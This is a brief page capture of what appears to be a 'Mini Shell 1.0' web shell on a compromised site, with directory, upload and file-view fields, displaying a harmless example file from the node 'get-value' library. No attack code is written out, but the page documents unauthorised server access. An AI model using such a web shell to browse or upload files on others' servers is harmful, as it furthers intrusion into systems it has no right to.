HOME


Mini Shell 1.0
Redirecting to https://devs.lapieza.net/iniciar-sesion Redirecting to https://devs.lapieza.net/iniciar-sesion.
DIR: /proc/1991111/root/usr/share/doc/node-get-value/examples/
Upload File :
Current File : //proc/1991111/root/usr/share/doc/node-get-value/examples/arrays.js
const get = require('..');

console.log(get({ a: { b: [{ c: 'd' }] } }, 'a.b.0.c'), 'd');
console.log(get({ a: { b: [{ c: 'd' }, { e: 'f' }] } }, 'a.b.1.e'), 'f');